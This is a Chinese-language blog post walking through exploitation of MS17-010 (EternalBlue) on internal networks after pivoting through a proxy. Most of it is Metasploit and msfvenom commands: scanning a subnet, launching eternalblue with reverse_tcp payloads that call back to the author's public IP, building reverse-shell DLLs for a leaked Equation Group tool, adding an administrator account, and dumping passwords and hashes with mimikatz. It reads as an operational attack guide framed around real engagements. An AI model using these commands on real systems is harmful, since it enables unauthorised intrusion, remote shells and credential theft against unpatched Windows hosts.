内网渗透之ms17-010

前言

在内网渗透时，通常挂上代理后。在内网首先会打啵ms17-010。在实战中，使用msf的ms17-010模块，数次没有反弹成功。基于此，到底如何成功利用ms17-010

ms17_010_eternalblue模块

在msf成功接收session之后，添加路由

run autoroute -p 

image.png

然后使用ms17-010相关的模块进行探测是否存在该漏洞。

use  auxiliary/scanner/smb/smb_ms17_010
set  rhosts 192.168.100.40-50 
set  threads 3

image.png

尝试利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.100.46
set lhost 144.30.xxx.xxx

LHOST配置为公网IP

image.png image.png

可以看到success。漏洞是可以利用的，但始终没有session。不知道什么原因。
参考资料：利用公网Msf+MS17010跨网段攻击内网
笔者在本地搭建环境，也是同样的结果。尝试更改payload为

windows/x64/meterpreter/bind_tcp 

bind_tcp攻击者去连接，容易被防火墙和杀毒发现
可以成功生成session，但并不稳定，且在run的过程中非常容易导致本来的session died

测试环境 实战环境

方程式漏洞利用工具

在实际使用msf的ms17_010_eternalblue模块时，笔者观察到有几个弊端。
1.session 很容易died
2.ms17_010_eternalblue模块利用起来非常耗时
3.无法利用成功
有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。
所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。
参考资料：萌新初试MS17-010方程式漏洞
工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件，替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候，调用x64.dll动态链接库，反弹到公网IP。原理和fb.py一样。

实战利用

笔者通过ew代理进内网后，在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合，威力巨大。成功利用ms17-010

网安永恒之蓝检测工具 方程式漏洞利用工具

windows server 2008

对于windows server 2008 ，msfvenom生成x64.dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=144.30.xxx.xxx LPORT=12345 -f dll > x64.dll

msf配置

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 144.30.xxx.xxx

将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP，就可以获取session。

image.png

windows server 2003

对于windows server 2003 ，msfvenom生成x86.dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=144.30.xxx.xxx LPORT=12345 -f dll > x86.dll

msf配置

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lport 12345
set lhost 144.30.xxx.xxx

image.png

进一步利用的一些命令

getuid
run   post/windows/gather/checkvm 
run   post/windows/manage/migrate
load  mimikatz
mimikatz_command -f sekurlsa::searchPasswords

image.png

实际测试发现这种session非常稳定。不会轻易go die

扩展

实际测试server 2003的ms17-010时，有时候多次执行后msf就接收不到session，而且ms17-010利用时，脆弱的server 2003非常容易蓝屏。
所以笔者选择一种稳定可靠一些的办法。
先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]

参考资料 Metasploit 「永恒之蓝」两种模块的利弊

use auxiliary/admin/smb/ms17_010_command

image.png

system的权限可以直接激活guest用户添加管理员组。

use exploit/windows/smb/ms17_010_psexec 
set rhosts  192.168.100.2
set SMBUser  guest
set SMBPass  123456
run

注意：使用ms17_010_psexec需要指定管理员的用户名、密码，否则没有session

image.png

同样的操作，载入mimikatz，读取管理员密码。

mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

image.png image.png